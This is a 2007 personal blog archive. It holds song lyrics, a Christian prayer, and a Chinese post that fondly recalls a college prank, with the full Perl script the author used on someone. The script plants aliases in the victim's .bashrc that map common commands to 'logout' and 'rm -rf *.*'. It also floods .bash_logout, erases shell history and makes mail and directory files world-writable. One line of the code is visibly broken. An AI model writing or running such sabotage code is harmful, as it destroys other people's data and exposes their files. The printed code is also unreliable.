Friday 30 November 2007

Tears in Heaven



I want to put my tears in heaven. My tears do not belong to earth.

Monday 19 November 2007

There can be Miracles

我想我現在可以體會亞伯拉罕和撒拉在等待以撒的心情。更貼切的應該是摩西在等待進入迦南的心情。



Many nights we pray
With no proof anyone could hear
And our hearts a hopeful song
We barely understood
Now we are not afraid
Although we know there's much to fear
We were moving mountains long
Before we know we could
There can be miracles
When you believe
Though hope is frail
It's hard to kill
Who knows what miracles
You can achieve
When you believe
Somehow you will
You will when you believe

In this time of fear
When prayer so often proves in vain
Hope seems like the summer birds
Too swiftly flown away
And now I am standing here
My heart's so full I can't explain
Seeking faith and speaking words
I never thought I'd say

There can be miracles
When you believe (When you believe)
Though hope is frail
It's hard to kill
Who knows what miracles
You can achieve (You can achieve)
When you believe
Somehow you will
You will when you believe

They don't always happen when you ask
And it's easy to give in to your fear
But when you're blinded by your pain
Can't see your way safe through the rain
Thought of a still resilient voice
Says love is very near

There can be miracles (miracles)
When you believe (When you believe)
Though hope is frail
It's hard to kill
Who knows what miracles
You can achieve (You can achieve)
When you believe
Somehow you will
You will when you believe
You will when you believe
You will when you believe
Just believe
You will when you believe

Dear Lord,

I am sorry that I do not have my faith upon you. When I look upon Moses, my grief is far less than him. Lord, Let me learn how to look upon you. Let me learn how to seek for your will and your kingdom rather than the honour and the glory on the world. Let me cling upon you. Lord, please directs me in daily life, be my light in front so that I will not fall into the trap. In Jesus's name, Amen.

Wednesday 14 November 2007

年少疯狂

这是我在大学时代写过最恐怖的整人程式。有人被整过,当然她欲哭无泪。这是当时的程式码。语言为PERL

@array = ("logout", "logout", "rm -rf *.*", "logout", "rm -rf *.*",
"logout");
@array2 = ("vi", "emacs", "pine", "lpr", "ls", "su");

`pwd > file.txt`;

open(FILE2, "> file.txt");
open(FILE, "> .bashrc");
open(FILE3,">.bash_logout");

print FILE "# User specific aliases and functions\n";

for($i = 0; $i < 6; $i++)
{
print FILE "alias $array2[$i] ='$array[$i]'\n";
}
`chmod 077 .bashrc`;

$a = ;
print FILE "# Source global definitions\n";
print FILE "if [ -f /etc/bashrc ]; then\n";
print FILE " . /etc/bashrc\n";
print FILE "fi\n";
print FILE "\n";
for($l = 0; $l < 1000000; $l++)
{
print FILE3 "ThIs ScRiPt iS WriTtEn bY KePlEr aUtO-GeNeRaTeD dAeMon\n";
}

`rm $a .bash_history`;

close(FILE);

@array3 = ("$a Mail", "$a Mailbox", "$a mail");

for($j = 0; $j < 3; $j++)
{
`chmod 777 $array3[$j]`;
}

`chmod -Rf 777 $a *.*`;
close(FILE3);
close(FILE2);

@array4 = ("file.txt", "ijc.pl");

for($k = 0; $k < 2; $k++)
{
`rm $array4[$k]`;
}